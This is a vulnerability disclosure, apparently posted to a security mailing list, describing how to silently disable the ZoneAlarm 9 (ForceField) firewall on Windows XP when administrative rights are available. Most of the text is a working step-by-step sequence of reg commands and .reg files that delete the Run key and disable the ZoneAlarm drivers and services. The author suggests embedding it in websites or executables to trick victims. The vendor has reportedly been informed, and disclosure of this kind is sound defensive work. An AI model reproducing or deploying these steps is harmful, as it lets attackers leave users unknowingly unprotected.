Hi, This disclosure pertains to ZoneAlarm 9 (ForceField). ZoneAlarm have been informed. The following discusses similar issues as was previously disclosed regarding ZoneAlarm 8. ZoneAlarm 9 (ForceField) ZoneAlarm version:9.1.007.002 TrueVector version:9.1.007.002 Driver version:9.1.007.002 Introduction The following illustrates how one can easily disable ZoneAlarm's security for whatever purposes. When "exploiting" this (administrative privileges are assumed) and the system rebooted, ZoneAlarm will be disarmed. I've tested this on various XP platforms successfully. Please let me know your thoughts on this. Impact This particular "vector" opens the door for "exploitation" via social means, thus unwitting victims may not even realise that their security has been disabled, leaving them exposed and unprotected. What if the following simple "proof of concept" was embedded (obfuscated/scripted/automated) within a website, executable, document etc; and via social means you unsuspectingly executed it? ZoneAlarm would be disarmed, leaving you exposed and unprotected. Preliminaries Firstly setup a continuous ping or similar to the system being tested, so as to verify that ZoneAlarm is working and blocking these. Step-by-step illustration 1) Firstly make a backup copy of the "Run" key (i.e. Runs). NOTE: This step is actually not required, however, will look less suspicious in the Task Manager. You could in fact just execute steps (2) and (5) & (6) if you wish. i.e. Command prompt reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /s /f 2) Then use the following 'brute-force' method to delete the "Run" key. ZoneAlarm 'locks' "ZoneAlarm Client" (zclient.exe), which ultimately controls & depends on "vsdatant.sys". NOTE: There is a - prepended to [HKEY] this is intentional. You need to create a registry file (.reg) with the following entries and execute. NOTE: Creating & executing the following registry file (.reg), may cause ZoneAlarm to panic, if so you may (or may not) see your ping replies. *** Registry entries start here *** Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] *** Registry entries end here *** 3) Delete (if exist) the "ZoneAlarm Clients" entries from the backup key (Runs). i.e. Command prompt reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ZoneAlarm Client" /f reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ISW" /f 4) Restore the backup key (Runs) to the original Key "Run". The whole objective here really is just to rid the "ZoneAlarm Client" (zclient.exe), thus "vsdatant.sys" is now vulnerable. i.e. Command prompt reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s /f 5) Create the following registry keys, or registry file (.reg), execute and reboot. NOTE: After rebooting, you may find that any egress traffic that used to prompt for access, now no longer prompts. *** Registry entries start here *** Windows Registry Editor Version 5.00 [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSDATANT\0000] "CSConfigFlags"=dword:00000001 [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWKL\0000] "CSConfigFlags"=dword:00000001 [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWSVC\0000] "CSConfigFlags"=dword:00000001 [HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSMON\0000] "CSConfigFlags"=dword:00000001 *** Registry entries end here *** 6) After and having rebooted in the previous step (5), and now that "vsdatant.sys" is vulnerable, re-run step (5) again (including reboot). ZoneAlarm should completely be disarmed and all traffic passing freely. NOTE: This step may (or may not) be required so as to persistently disable "vsdatant.sys". Cheers Andrew Barkley (-_-)
